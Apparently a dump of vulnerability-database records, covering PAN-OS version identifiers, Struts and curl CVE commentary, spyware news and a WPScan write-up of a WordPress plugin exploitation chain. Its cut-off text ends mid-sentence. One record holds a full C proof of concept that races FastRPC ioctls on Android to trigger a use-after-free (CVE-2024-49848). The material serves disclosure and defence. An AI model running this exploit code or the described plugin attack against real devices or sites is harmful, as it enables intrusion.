s:pan-os:11.1.0:h3:\\*:\\*:\\*:\\*:\\*:\\*\n\ncpe:2.3:o:paloaltonetworks:pan-os:11.1.0:h2:\\*:\\*:\\*:\\*:\\*:\\*\n\ncpe:2.3:o:paloaltonetworks:pan-os:11.1.0:h1:\\*:\\*:\\*:\\*:\\*:\\*\n\ncpe:2.3:o:paloaltonetworks:pan-os:11.1.0:-:\\*:\\*:\\*:\\*:\\*:\\*\n\ncpe:2.3:o:paloaltonetworks:pan-os:11.1:-:\\*:\\*:\\*:\\*:\\*:\\*\n\ncpe:2.3:o:paloaltonetworks:pan-os:10.2.10:h10:\\*:\\*:\\*:\\*:\\*:\\*\n\ncpe:2.3:o:paloaltonetworks:pan-os:10.2.10:h9:\\*:\\*:\\*:\\*:\\*:\\*\n\ncpe:2.3:o:paloaltonetworks:pan-os:10.2.10:h8:\\*:\\*:\\*:\\*:\\*:\\*\n\ncpe:2.3:o:paloaltonetworks:pan-os:10.2.10:h7:\\*:\\*:\\*:\\*:\\*:\\*\n\ncpe:2.3:o:paloaltonetworks:pan-os:10.2.10:h6:\\*:\\*:\\*:\\*:\\*:\\*\n\ncpe:2.3:o:paloaltonetworks:pan-os:10.2.10:h5:\\*:\\*:\\*:\\*:\\*:\\*\n\ncpe:2.3:o:paloaltonetworks:pan-os:10.2.10:h4:\\*:\\*:\\*:\\*:\\*:\\*\n\ncpe:2.3:o:paloaltonetworks:pan-os:10.2.10:h3:\\*:\\*:\\*:\\*:\\*:\\*\n\ncpe:2.3:o:paloaltonetworks:pan-os:10.2.10:h2:\\*:\\*:\\*:\\*:\\*:\\*\n\ncpe:2.3:o:paloaltonetworks:pan-os:10.2.10:h1:\\*:\\*:\\*:\\*:\\*:\\*\n\ncpe:2.3:o:paloaltonetworks:pan-os:10.2.10:-:\\*:\\*:\\*:\\*:\\*:\\*\n\ncpe:2.3:o:paloaltonetworks:pan-os:10.2.9:h18:\\*:\\*:\\*:\\*:\\*:\\*\n\ncpe:2.3:o:paloaltonetworks:pan-os:10.2.9:h17:\\*:\\*:\\*:\\*:\\*:\\*\n\ncpe:2.3:o:paloaltonetworks:pan-os:10.2.9:h16:\\*:\\*:\\*:\\*:\\*:\\*\n\ncpe:2.3:o:paloaltonetworks:pan-os:10.2.9:h15:\\*:\\*:\\*:\\*:\\*:\\*\n\ncpe:2.3:o:paloaltonetworks:pan-os:10.2.9:h14:\\*:\\*:\\*:\\*:\\*:\\*\n\ncpe:2.3:o:paloaltonetworks:pan-os:10.2.9:h13:\\*:\\*:\\*:\\*:\\*:\\*\n\ncpe:2.3:o:paloaltonetworks:pan-os:10.2.9:h12:\\*:\\*:\\*:\\*:\\*:\\*\n\ncpe:2.3:o:paloaltonetworks:pan-os:10.2.9:h11:\\*:\\*:\\*:\\*:\\*:\\*\n\ncpe:2.3:o:paloaltonetworks:pan-os:10.2.9:h10:\\*:\\*:\\*:\\*:\\*:\\*\n\ncpe:2.3:o:paloaltonetworks:pan-os:10.2.9:h9:\\*:\\*:\\*:\\*:\\*:\\*\n\ncpe:2.3:o:paloaltonetworks:pan-os:10.2.9:h8:\\*:\\*:\\*:\\*:\\*:\\*\n\ncpe:2.3:o:paloaltonetworks:pan-os:10.2.9:h7:\\*:\\*:\\*:\\*:\\*:\\*\n\ncpe:2.3:o:paloaltonetworks:pan-os:10.2.9:h6:\\*:\\*:\\*:\\*:\\*:\\*\n\ncpe:2.3:o:paloaltonetworks:pan-os:10.2.9:h5:\\*:\\*:\\*:\\*:\\*:\\*\n\ncpe:2.3:o:paloaltonetworks:pan-os:10.2.9:h4:\\*:\\*:\\*:\\*:\\*:\\*\n\ncpe:2.3:o:paloaltonetworks:pan-os:10.2.9:h3:\\*:\\*:\\*:\\*:\\*:\\*\n\ncpe:2.3:o:paloaltonetworks:pan-os:10.2.9:h2:\\*:\\*:\\*:\\*:\\*:\\*\n\ncpe:2.3:o:paloaltonetworks:pan-os:10.2.9:h1:\\*:\\*:\\*:\\*:\\*:\\*\n\ncpe:2.3:o:paloaltonetworks:pan-os:10.2.9:-:\\*:\\*:\\*:\\*:\\*:\\*\n\ncpe:2.3:o:paloaltonetworks:pan-os:10.2.8:h18:\\*:\\*:\\*:\\*:\\*:\\*\n\ncpe:2.3:o:paloaltonetworks:pan-os:10.2.8:h17:\\*:\\*:\\*:\\*:\\*:\\*\n\ncpe:2.3:o:paloaltonetworks:pan-os:10.2.8:h16:\\*:\\*:\\*:\\*:\\*:\\*\n\ncpe:2.3:o:paloaltonetworks:pan-os:10.2.8:h15:\\*:\\*:\\*:\\*:\\*:\\*\n\ncpe:2.3:o:paloaltonetworks:pan-os:10.2.8:h14:\\*:\\*:\\*:\\*:\\*:\\*\n\ncpe:2.3:o:paloaltonetworks:pan-os:10.2.8:h13:\\*:\\*:\\*:\\*:\\*:\\*\n\ncpe:2.3:o:paloaltonetworks:pan-os:10.2.8:h12:\\*:\\*:\\*:\\*:\\*:\\*\n\ncpe:2.3:o:paloaltonetworks:pan-os:10.2.8:h11:\\*:\\*:\\*:\\*:\\*:\\*\n\ncpe:2.3:o:paloaltonetworks:pan-os:10.2.8:h10:\\*:\\*:\\*:\\*:\\*:\\*\n\ncpe:2.3:o:paloaltonetworks:pan-os:10.2.8:h9:\\*:\\*:\\*:\\*:\\*:\\*\n\ncpe:2.3:o:paloaltonetworks:pan-os:10.2.8:h8:\\*:\\*:\\*:\\*:\\*:\\*\n\ncpe:2.3:o:paloaltonetworks:pan-os:10.2.8:h7:\\*:\\*:\\*:\\*:\\*:\\*\n\ncpe:2.3:o:paloaltonetworks:pan-os:10.2.8:h6:\\*:\\*:\\*:\\*:\\*:\\*\n\ncpe:2.3:o:paloaltonetworks:pan-os:10.2.8:h5:\\*:\\*:\\*:\\*:\\*:\\*\n\ncpe:2.3:o:paloaltonetworks:pan-os:10.2.8:h4:\\*:\\*:\\*:\\*:\\*:\\*\n\ncpe:2.3:o:paloaltonetworks:pan-os:10.2.8:h3:\\*:\\*:\\*:\\*:\\*:\\*\n\ncpe:2.3:o:paloaltonetworks:pan-os:10.2.8:h2:\\*:\\*:\\*:\\*:\\*:\\*\n\ncpe:2.3:o:paloaltonetworks:pan-os:10.2.8:h1:\\*:\\*:\\*:\\*:\\*:\\*\n\ncpe:2.3:o:paloaltonetworks:pan-os:10.2.8:-:\\*:\\*:\\*:\\*:\\*:\\*\n\ncpe:2.3:o:paloaltonetworks:pan-os:10.2:-:\\*:\\*:\\*:\\*:\\*:\\*\n\ncpe:2.3:o:paloaltonetworks:pan-os:10.1.14:h6:\\*:\\*:\\*:\\*:\\*:\\*\n\ncpe:2.3:o:paloaltonetworks:pan-os:10.1.14:h5:\\*:\\*:\\*:\\*:\\*:\\*\n\ncpe:2.3:o:paloaltonetworks:pan-os:10.1.14:h4:\\*:\\*:\\*:\\*:\\*:\\*\n\ncpe:2.3:o:paloaltonetworks:pan-os:10.1.14:h3:\\*:\\*:\\*:\\*:\\*:\\*\n\ncpe:2.3:o:paloaltonetworks:pan-os:10.1.14:h2:\\*:\\*:\\*:\\*:\\*:\\*\n\ncpe:2.3:o:paloaltonetworks:pan-os:10.1.14:h1:\\*:\\*:\\*:\\*:\\*:\\*\n\ncpe:2.3:o:paloaltonetworks:pan-os:10.1.14:-:\\*:\\*:\\*:\\*:\\*:\\*\n\ncpe:2.3:o:paloaltonetworks:pan-os:10.1:-:\\*:\\*:\\*:\\*:\\*:\\*",
   description_format: "markdown",
   vulnerability: "CVE-2024-3393",
   creation_timestamp: "2024-12-27T08:59:02.439757+00:00",
   timestamp: "2024-12-27T08:59:47.544807+00:00",
   related_vulnerabilities: [
      "CVE-2024-3393",
   ],
   meta: [
      {
         tags: [
            "vulnerability:information=remediation",
         ],
      },
   ],
}

{
   uuid: "a459b3c2-e2f0-467e-8fe5-e7c2b47a9fe3",
   vulnerability_lookup_origin: "1a89b78e-f703-45f3-bb86-59eb712668bd",
   title: "CVE-2023-50164 - Rapid7 analysis",
   description: "Reference - [https://attackerkb.com/topics/pe3CCtOE81/cve-2023-50164/rapid7-analysis](https://attackerkb.com/topics/pe3CCtOE81/cve-2023-50164/rapid7-analysis)\n\n[Apache Struts](https://struts.apache.org/) is a popular Java web application framework. On December 7, 2023 Apache [published an advisory](https://www.openwall.com/lists/oss-security/2023/12/07/1) for [CVE-2023-50164](https://nvd.nist.gov/vuln/detail/CVE-2023-50164), a Struts parameter pollution vulnerability that potentially leads to arbitrary file uploads. An attacker with the ability to perform arbitrary file uploads is very likely to be able to leverage this and achieve remote code execution. According [to the vendor](https://cwiki.apache.org/confluence/display/WW/S2-066), the following versions of Struts are affected:\n\n*   Struts 2.0.0 – Struts 2.3.37 (End of Life)  \n    \n*   Struts 2.5.0 – Struts 2.5.32  \n    \n*   Struts 6.0.0 – Struts 6.3.0  \n    \n\nSeveral technical analyses on the root cause of the vulnerability have already been done ([here](https://trganda.github.io/notes/security/vulnerabilities/apache-struts/Apache-Struts-Remote-Code-Execution-Vulnerability-\\(-S2-066-CVE-2023-50164\\)), [here](https://xz.aliyun.com/t/13172), and [here](https://github.com/jakabakos/CVE-2023-50164-Apache-Struts-RCE)). Notably, all current public analysis of the vulnerability demonstrates exploitation on a custom made demo web application.\n\n**There are currently no known production web applications that are exploitable**, although this is likely to change as the vulnerability comes under more scrutiny from researchers, and given the popularity of the Struts framework in enterprise web applications. Several security firms have reported exploitation ([here](https://twitter.com/akamai_research/status/1735049812746137929) and [here](https://twitter.com/shadowserver/status/1734919288257974380)), but as of December 15, 2023, it is unclear if the activity being reported actually refers to successful exploitation (i.e., code execution) against one or more known vulnerable targets, or if this is merely highlighting exploit attempts with the existing public PoCs (all of which target a demo application) being sprayed opportunistically at indiscriminate targets.\n\nHowever, exploitation of this vulnerability will be target-specific based on the differing target action’s endpoints, the naming convention of the expected uploaded file name, and any other target-specific restrictions that may need to be overcome.\n\n# Remediation\n\nVendors who develop applications that use Apache Struts should upgrade to Struts 2.5.33, Struts 6.3.0.2, or greater to remediate CVE-2023-50164.",
   description_format: "markdown",
   vulnerability: "CVE-2023-50164",
   creation_timestamp: "2024-12-19T05:35:41.724032+00:00",
   timestamp: "2024-12-19T05:38:18.769241+00:00",
   related_vulnerabilities: [
      "CVE-2023-50164",
   ],
   meta: [
      {
         tags: [
            "vulnerability:information=remediation",
         ],
      },
      {
         ref: " https://attackerkb.com/topics/pe3CCtOE81/cve-2023-50164/rapid7-analysis",
      },
   ],
}

{
   uuid: "23fd524b-475e-4b9f-8dc2-7b67f4cec409",
   vulnerability_lookup_origin: "1a89b78e-f703-45f3-bb86-59eb712668bd",
   title: "FASTRPC_ATTR_KEEP_MAP logic bug allows fastrpc_internal_munmap_fd to concurrently free in-use mappings leading to UAF",
   description: "Ref: [https://project-zero.issues.chromium.org/issues/42451725](https://project-zero.issues.chromium.org/issues/42451725)\n\n~~~\n#include \"adsprpc_shared.h\"\n#include <fcntl.h>\n#include <unistd.h>\n#include <stdio.h>\n#include <stdlib.h>\n#include <sys/wait.h>\n#include <linux/dma-heap.h>\n#include <sys/mman.h>\n#include <errno.h>\n#include <pthread.h>\n#include <signal.h>\n\n#define FASTRPC_MODE_UNSIGNED_MODULE 8\n#define FASTRPC_STATIC_HANDLE_PROCESS_GROUP (1)\n#define FASTRPC_STATIC_HANDLE_DSP_UTILITIES (2)\n#define FASTRPC_STATIC_HANDLE_LISTENER (3)\n#define FASTRPC_STATIC_HANDLE_CURRENT_PROCESS (4)\nint dma_heap;\nint adsprpc_fd;\nint create_and_init_adsprpc()\n{\n    int adsprpc_fd = open(\"/dev/adsprpc-smd\",O_RDONLY);\n    if(adsprpc_fd == -1) {\n        printf(\"open: %m\\n\");\n        return -1;\n    }\n    unsigned cid = 3;\n    long ret = ioctl(adsprpc_fd,FASTRPC_IOCTL_GETINFO,&cid);\n    int shell_fd = open(\"/data/local/tmp/fastrpc_shell_unsigned_3\",O_RDONLY);\n    if(shell_fd == -1) {\n        printf(\"open shell: %m\\n\");\n        return -1;\n    }\n    dma_heap = open(\"/dev/dma_heap/system\",O_RDONLY);\n    if(dma_heap == -1) {\n        printf(\"open dma_heap: %m\\n\");\n        return -1;\n    }\n    struct dma_heap_allocation_data heap_data = {\n        .len = 0x131000,\n        .fd_flags = O_RDWR,\n    };\n    ret = ioctl(dma_heap,DMA_HEAP_IOCTL_ALLOC,&heap_data);\n    if( ret < 0 || heap_data.fd < 0)\n    {\n        printf(\"dma heap allocation fail: %d %d %m\\n\",ret,heap_data.fd);\n        return -1;\n    }\n    void* shell_file_dma = mmap(NULL,0x131000,PROT_READ | PROT_WRITE, MAP_SHARED,heap_data.fd,0);\n    long length = read(shell_fd,shell_file_dma,0x131000);\n    if(length <= 0) {\n        printf(\"read: %d %m\\n\",ret);\n        return -1;\n    }\n    close(shell_fd);\n    struct fastrpc_ioctl_init_attrs init = {\n        .init = {\n            .file = shell_file_dma,\n            .filefd = heap_data.fd,\n            .filelen = length,\n            .mem = 0,\n            .flags = FASTRPC_INIT_CREATE,\n        },\n        .attrs = FASTRPC_MODE_UNSIGNED_MODULE\n    };\n    ret = ioctl(adsprpc_fd,FASTRPC_IOCTL_INIT_ATTRS,&init);\n    if(ret < 0)\n    {\n        printf(\"init_attrs: %d %m\\n\",ret);\n        return -1;\n    }\n    return adsprpc_fd;\n}\npthread_barrier_t* barrier;\npthread_t tid_inv,tid_int;\nunsigned long* value_loc;\nstruct dma_heap_allocation_data heap_data = {\n    .len = 0x10000,\n    .fd_flags = O_RDWR,\n};\nvoid handler(int signo, siginfo_t *info, void* context) {\n    return;\n}\nsig_atomic_t jobid = 0;\nlong submit_job() {\n    unsigned value = 255;\n    unsigned out_values[256] = {0};\n    struct fastrpc_ioctl_invoke_async ioctl_arg;\n    remote_arg_t ra[2];\n    ra[0].buf.pv = (void *)&value;\n    ra[0].buf.len = sizeof(value);\n    ra[1].buf.pv = (void *)(&out_values[1]);\n    ra[1].buf.len = value * sizeof(uint32_t);\n    ioctl_arg.inv.handle = FASTRPC_STATIC_HANDLE_CURRENT_PROCESS;\n    ioctl_arg.inv.sc = REMOTE_SCALARS_MAKE(0, 1, 1);\n    ioctl_arg.inv.pra = ra;\n    ioctl_arg.fds = NULL;\n    ioctl_arg.attrs = NULL;\n    ioctl_arg.crc = NULL;\n    ioctl_arg.perf_kernel = NULL;\n    ioctl_arg.perf_dsp = NULL;\n    ioctl_arg.job = NULL;\n    ioctl_arg.job = malloc(sizeof(*ioctl_arg.job));\n    ioctl_arg.job->isasyncjob = 1;\n    ioctl_arg.job->jobid = jobid++;\n    struct fastrpc_ioctl_invoke2 inv;\n    inv.invparam = &ioctl_arg;\n    inv.req = FASTRPC_INVOKE2_ASYNC;\n    inv.size = sizeof(struct fastrpc_ioctl_invoke_async);\n\n    long ret = ioctl(adsprpc_fd,FASTRPC_IOCTL_INVOKE2,&inv);\n    printf(\"submit job ret: %lx %m\\n\",ret);\n    return ret;\n}\nvoid* thread_inv(void* arg) {\n    while(1) {\n    //Need to replace value with & new map on other thread\n        unsigned value = 255;\n        unsigned out_values[256] = {0};\n        long ret;\n        //Not using submit_job() to increase race precision\n        struct fastrpc_ioctl_invoke_async ioctl_arg;\n        remote_arg_t ra[2];\n        ra[0].buf.pv = (void *)0;\n        ra[0].buf.len = sizeof(value);\n        ra[1].buf.pv = (void *)(&out_values[1]);\n        ra[1].buf.len = value * sizeof(uint32_t);\n        ioctl_arg.inv.handle = FASTRPC_STATIC_HANDLE_CURRENT_PROCESS;\n        ioctl_arg.inv.sc = REMOTE_SCALARS_MAKE(0, 1, 1);\n        ioctl_arg.inv.pra = ra;\n        ioctl_arg.fds = calloc(REMOTE_SCALARS_LENGTH(ioctl_arg.inv.sc),sizeof(int));\n        ioctl_arg.fds[0] = heap_data.fd;\n        ioctl_arg.fds[1] = -1;\n        ioctl_arg.attrs = NULL;\n        ioctl_arg.crc = NULL;\n        ioctl_arg.perf_kernel = NULL;\n        ioctl_arg.perf_dsp = NULL;\n        ioctl_arg.job = malloc(sizeof(*ioctl_arg.job));\n        ioctl_arg.job->isasyncjob = 1;\n        ioctl_arg.job->jobid = jobid++;\n        struct fastrpc_ioctl_invoke2 inv;\n        inv.invparam = &ioctl_arg;\n        inv.req = FASTRPC_INVOKE2_ASYNC;\n        inv.size = sizeof(struct fastrpc_ioctl_invoke_async);\n        close(heap_data.fd);\n        pthread_barrier_wait(barrier);\n        ret = ioctl(adsprpc_fd,FASTRPC_IOCTL_INVOKE2,&inv);\n        printf(\"job submit: %ld %m\\n\",ret);\n        fflush(stdout);\n        if(!ret) {\n            *((unsigned*) &barrier[1]) = 1;\n            pthread_barrier_wait(barrier);\n            exit(0);\n        }\n        pthread_barrier_wait(barrier);\n\n    }\n\n    \n    return NULL;\n}\n\nint main() {\n    adsprpc_fd = create_and_init_adsprpc();\n    if(adsprpc_fd == -1) {\n        printf(\"failed to open adsprpc...\\n\");\n        return 1;\n    }\n    barrier = mmap(NULL,0x1000,PROT_READ | PROT_WRITE,MAP_SHARED | MAP_ANONYMOUS,0,0);\n    pthread_barrierattr_t attr;\n    pthread_barrierattr_init(&attr);\n    pthread_barrierattr_setpshared(&attr,PTHREAD_PROCESS_SHARED);\n    pthread_barrier_init(barrier,&attr,2);\n    //pthread_create(&tid_int,NULL,&thread_interrupt,NULL);\n\n    int ret = ioctl(dma_heap,DMA_HEAP_IOCTL_ALLOC,&heap_data);\n    if( ret < 0 || heap_data.fd < 0)\n    {\n        printf(\"dma heap allocation fail: %d %d %m\\n\",ret,heap_data.fd);\n        return -1;\n    }\n\n    // for(unsigned i = 0; i < 1022; i++) {\n    //     if(submit_job() < 0) {\n    //         printf(\"failed to submit a job at i = %u\\n\",i);\n    //         exit(0);\n    //     }\n    // }\n    printf(\"mapping...\\n\");\n    fflush(stdout);\n    value_loc = mmap(NULL,0x2000,PROT_READ | PROT_WRITE,MAP_PRIVATE,heap_data.fd,0);\n    pid_t pid;\n    if(!(pid = fork())) {\n        thread_inv(NULL);\n        exit(0);\n    }\n    // pthread_create(&tid_inv,NULL,&thread_inv,NULL);\n\n    unsigned long spoof_map = 0x2000;\n    uint64_t vaddrouts[1024];\n    unsigned top = 0;\n    do {\n        struct fastrpc_ioctl_mem_map mmap_struct = {\n                .m = {\n                    .flags = 0,\n                    .fd = heap_data.fd,\n                    .length = 0x2000,\n                    .attrs = 0,\n                    .vaddrin = spoof_map,\n                    .vaddrout = 0,\n                    .offset = 0,\n                }\n        };\n        spoof_map += 0x2000;\n        unsigned long ioret = ioctl(adsprpc_fd,FASTRPC_IOCTL_MEM_MAP,&mmap_struct);\n        printf(\"mem_map loop: %lx 0x%lx\\n\",ioret,mmap_struct.m.vaddrout);\n        vaddrouts[top] = mmap_struct.m.vaddrout;\n    } while (vaddrouts[top++]);\n    // struct fastrpc_ioctl_mem_map mmap_struct = {\n    //         .m = {\n    //             .flags = 0,\n    //             .fd = heap_data.fd,\n    //             .length = 0x1000,\n    //             .attrs = 0,\n    //             .vaddrin = value_loc,\n    //             .offset = 0,\n    //         }\n    // };\n    //     //pthread_barrier_wait(&barrier);\n    // unsigned long ioret = ioctl(adsprpc_fd,FASTRPC_IOCTL_MEM_MAP,&mmap_struct);\n    // printf(\"mem_map1: %lx 0x%lx\\n\",ioret,mmap_struct.m.vaddrout);\n    // struct fastrpc_ioctl_mem_unmap unmap_struct = {\n    //     .um = {\n    //         .fd = heap_data.fd,\n    //         .length = 0x1000,\n    //         .vaddr = mmap_struct.m.vaddrout\n    //     }\n    // };\n    // ioret = ioctl(adsprpc_fd,FASTRPC_IOCTL_MEM_UNMAP,&unmap_struct);\n    // printf(\"mem_unmap1: %lx\\n\",ioret);\n    unsigned first = true;\n    while(1) {\n        struct fastrpc_ioctl_mem_map mmap_struct = {\n            .m = {\n                .flags = FASTRPC_MAP_FD_NOMAP,\n                .fd = heap_data.fd,\n                .length = 0x1000,\n                .attrs = FASTRPC_ATTR_KEEP_MAP,\n                .vaddrin = value_loc,\n                .offset = -1,\n            }\n        };\n        pthread_barrier_wait(barrier);\n        unsigned long ret = ioctl(adsprpc_fd,FASTRPC_IOCTL_MEM_MAP,&mmap_struct);\n        printf(\"mem_map2: %lx\\n\",ret);\n        fflush(stdout);\n        struct fastrpc_ioctl_munmap_fd final_munmap = {\n            .fd = heap_data.fd,\n            .flags = 0,\n            .len = 0x1000,\n            .va = 0\n        };\n        unsigned long final_ret = ioctl(adsprpc_fd,FASTRPC_IOCTL_MUNMAP_FD,&final_munmap);\n        printf(\"munmap fd: %lx %m\\n\",final_ret);\n        pthread_barrier_wait(barrier);\n        if(*(unsigned*)&barrier[1]) {\n            break;\n        }\n        if(first && fgetc(stdin) == 'n') {\n            kill(pid,SIGKILL);\n            exit(0);\n        }\n        first = false;\n    }\n    // pthread_join(tid_int,NULL);\n    // pthread_join(tid_inv,NULL);\n    \n\n    // for(unsigned i = 0; i < top; i++)\n    // {\n    //     struct fastrpc_ioctl_mem_unmap unmap_struct = {\n    //         .um = {\n    //             .fd = heap_data.fd,\n    //             .length = 0x2000,\n    //             .vaddr = vaddrouts[i],\n    //         }\n    //     };\n    //     unsigned long ioret = ioctl(adsprpc_fd,FASTRPC_IOCTL_MEM_UNMAP,&unmap_struct);\n    //     if(ioret)\n    //         printf(\"unexpected unmap fail %lx %m\\n\",ioret);\n    // }\n    // while(1) sleep(1);\n    return 0;\n    // struct fastrpc_ioctl_mmap mmap_struct2 = {\n    //     .fd = -1,\n    //     .flags = ADSP_MMAP_HEAP_ADDR,\n    //     .vaddrin = 0,\n    //     .size = 0x1000\n    // };\n    // ret = ioctl(adsprpc_fd,FASTRPC_IOCTL_MMAP,&mmap_struct2);\n    // if(ret < 0)\n    // {\n    //     printf(\"ret mmap: %lx %m\\n\",ret);\n    // }\n    // printf(\"vaddrout: %lx %m\\n\",mmap_struct2.vaddrout);\n\n}\n~~~",
   description_format: "markdown",
   vulnerability: "CVE-2024-49848",
   creation_timestamp: "2024-12-18T13:24:38.041835+00:00",
   timestamp: "2024-12-18T13:25:07.723264+00:00",
   related_vulnerabilities: [],
   meta: [
      {
         tags: [
            "vulnerability:exploitability=documented",
            "vulnerability:information=PoC",
            "vulnerability:information=annotation",
         ],
      },
   ],
}

{
   uuid: "942a20f3-cbb3-4457-b3b0-4ddf34d2d6e7",
   vulnerability_lookup_origin: "1a89b78e-f703-45f3-bb86-59eb712668bd",
   title: "Some questions about CVE-2017-7407 and Bagder's work quality (@bagder@mastodon.social) 🙃",
   description: "It seems that Bagder loves when someone dives deep into history and believes they have found a mistake in his work.",
   description_format: "markdown",
   vulnerability: "CVE-2017-7407",
   creation_timestamp: "2024-12-18T09:17:43.314628+00:00",
   timestamp: "2024-12-18T09:32:02.829318+00:00",
   related_vulnerabilities: [],
   meta: [
      {
         ref: [
            "https://mastodon.social/users/bagder/statuses/113672931060541852",
            "https://curl.se/mail/lib-2024-12/0024.html",
         ],
      },
   ],
}

{
   uuid: "63467d03-38f4-4840-bb15-7a6df0e7160d",
   vulnerability_lookup_origin: "1a89b78e-f703-45f3-bb86-59eb712668bd",
   title: "Serbia: Authorities using spyware and Cellebrite forensic extraction tools to hack journalists and activists",
   description: "\n> \"Serbian police and intelligence authorities are using advanced phone spyware alongside mobile phone forensic products to unlawfully target journalists, environmental activists and other individuals in a covert surveillance campaign, a new Amnesty International report has revealed. \"\n\nMore information here: https://securitylab.amnesty.org/latest/2024/12/serbia-a-digital-prison-spyware-and-cellebrite-used-on-journalists-and-activists/",
   description_format: "markdown",
   vulnerability: "CVE-2024-49848",
   creation_timestamp: "2024-12-17T20:35:21.382555+00:00",
   timestamp: "2024-12-17T20:35:21.382555+00:00",
   related_vulnerabilities: [],
   meta: [
      {
         ref: [
            "https://securitylab.amnesty.org/latest/2024/12/serbia-a-digital-prison-spyware-and-cellebrite-used-on-journalists-and-activists/",
         ],
      },
   ],
}

{
   uuid: "5d1aa981-8c34-43d5-bc8f-afcd585d782a",
   vulnerability_lookup_origin: "1a89b78e-f703-45f3-bb86-59eb712668bd",
   title: "PoC and details for CyberPanel",
   description: "- [ CyberPanel authenticated RCE < 2.3.8 ](https://github.com/ThottySploity/CVE-2024-53376)",
   description_format: "markdown",
   vulnerability: "cve-2024-53376",
   creation_timestamp: "2024-12-17T05:27:57.023081+00:00",
   timestamp: "2024-12-17T05:27:57.023081+00:00",
   related_vulnerabilities: [
      "CVE-2024-53376",
   ],
   meta: [
      {
         tags: [
            "vulnerability:exploitability=documented",
            "vulnerability:information=PoC",
         ],
      },
   ],
}

{
   uuid: "ec831761-cc7a-463a-bf13-08ab7d376af1",
   vulnerability_lookup_origin: "1a89b78e-f703-45f3-bb86-59eb712668bd",
   title: "Bugzilla record for this vulnerability",
   description: "- [Bug 2331686 (CVE-2024-53677) - CVE-2024-53677 struts: org.apache.struts: mixing setters for uploaded files and normal fields can allow bypass file upload checks ](https://bugzilla.redhat.com/show_bug.cgi?id=2331686)\n\nAn interesting note: **Note: application not using FileUploadInterceptor are safe.** ",
   description_format: "markdown",
   vulnerability: "CVE-2024-53677",
   creation_timestamp: "2024-12-16T14:25:04.252985+00:00",
   timestamp: "2024-12-16T14:25:04.252985+00:00",
   related_vulnerabilities: [
      "CVE-2024-53677",
   ],
   meta: [
      {
         tags: [
            "vulnerability:information=annotation",
         ],
      },
   ],
}

{
   uuid: "d5063906-100a-4bf2-9ef4-94173879f4e1",
   vulnerability_lookup_origin: "1a89b78e-f703-45f3-bb86-59eb712668bd",
   title: "CVE-2024-11053 is *not* a critical security flaw",
   description: "Clarification by the author/maintainer of the project:\n\n[https://mastodon.social/@bagder/113657205050547339](https://mastodon.social/@bagder/113657205050547339)\n\n~~~\nFYI: CVE-2024-11053 is *not* a critical security flaw, even if now several security related sites repeat that statement.\n\nThis is as good as any reminder that you should read the #curl advisories for #curl issues rather than trusting the scaremongers.\n~~~\n\n[https://curl.se/docs/CVE-2024-11053.html](https://curl.se/docs/CVE-2024-11053.html)",
   description_format: "markdown",
   vulnerability: "CVE-2024-11053",
   creation_timestamp: "2024-12-15T15:17:20.218435+00:00",
   timestamp: "2024-12-15T15:17:59.506935+00:00",
   related_vulnerabilities: [
      "CVE-2024-11053",
   ],
   meta: [
      {
         tags: [
            "vulnerability:information=annotation",
         ],
      },
   ],
}

{
   uuid: "5e1cc667-8f06-4cde-b167-203c95a1038c",
   vulnerability_lookup_origin: "1a89b78e-f703-45f3-bb86-59eb712668bd",
   title: "Unauthorized Plugin Installation/Activation in Hunk Companion | WPScan",
   description: "# Unauthorized Plugin Installation/Activation in Hunk Companion | WPScan\n\nRef: https://wpscan.com/blog/unauthorized-plugin-installation-activation-in-hunk-companion/\n\nThis report highlights a vulnerability in the [Hunk Companion plugin](https://wordpress.org/plugins/hunk-companion/) < 1.9.0 that allows unauthenticated POST requests to install and activate plugins directly from the WordPress.org repository.\n\nThis flaw poses a significant security risk, as it enables attackers to install vulnerable or closed plugins, which can then be exploited for attacks such as Remote Code Execution (RCE), SQL Injection, Cross‑Site Scripting (XSS), or even the creation of administrative backdoors. By leveraging these outdated or unmaintained plugins, attackers can bypass security measures, manipulate database records, execute malicious scripts, and gain unauthorized administrative access to the site.\n\nMethod of Exploitation\n----------------------\n\nWhile tracing an infection on a WordPress site, we uncovered a live vulnerability currently being exploited in a two‑step process:\n\n1.  **Unauthenticated Installation/Activation**: Attackers exploit a flaw to install and activate the now‑closed and vulnerable plugin, [WP Query Console](https://wordpress.org/plugins/wp-query-console/)\n2.  **Remote Code Execution (RCE)**: The vulnerability in WP Query Console is then exploited to evaluate arbitrary and malicious PHP code.\n\nIn the infections we’ve analyzed, attackers use the RCE to write a PHP dropper to the site’s root directory. This dropper allows continued unauthenticated uploads via GET requests, enabling persistent backdoor access to the site.\n\nInvestigation\n-------------\n\nThe vulnerability was uncovered during an investigation into the entry point for an infection caused by its exploitation. Access logs revealed that the `change timestamp` of a randomly named PHP file located in the root of the WordPress installation (`/htdocs/aea74fff3c02.php`) was preceded by requests to the following endpoints:\n\n\n\n* Time: Nov 27, 2024 @ 08:21:41.812\n  * request_url: /aea74fff3c02.php\n  * http_user_agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2735.76 Safari/537.36\n  * request_type: GET\n* Time: Nov 27, 2024 @ 08:21:41.561\n  * request_url: /?rest_route=/wqc/v1/query\n  * http_user_agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2735.76 Safari/537.36\n  * request_type: POST\n* Time: Nov 27, 2024 @ 08:21:40.354\n  * request_url: /wp-json/hc/v1/themehunk-import\n  * http_user_agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2735.76 Safari/537.36\n  * request_type: POST\n* Time: Nov 27, 2024 @ 08:21:08.151\n  * request_url: /wp-json/hc/v1/themehunk-import\n  * http_user_agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2735.76 Safari/537.36\n  * request_type: POST\n\n\nFurther investigation revealed that the plugins responsible for these endpoints are **Hunk Companion** and **WP Query Console**, respectively. Each observed infection’s modification times aligned with POST requests to these same endpoints.\n\nThe Remote Code Execution (RCE) vulnerability in WP Query Console, reported under [CVE‑2024‑50498](https://www.cve.org/CVERecord?id=CVE-2024-50498), remains unpatched. Meanwhile, the unauthenticated plugin installation/activation vulnerability in Hunk Companion was reportedly fixed in version 1.8.5 and greater, as documented in [CVE‑2024‑9707](https://www.cve.org/CVERecord?id=CVE-2024-9707).\n\nUpon further review, we confirmed that this infection did, in fact, occur with the latest version of Hunk Companion at that time, 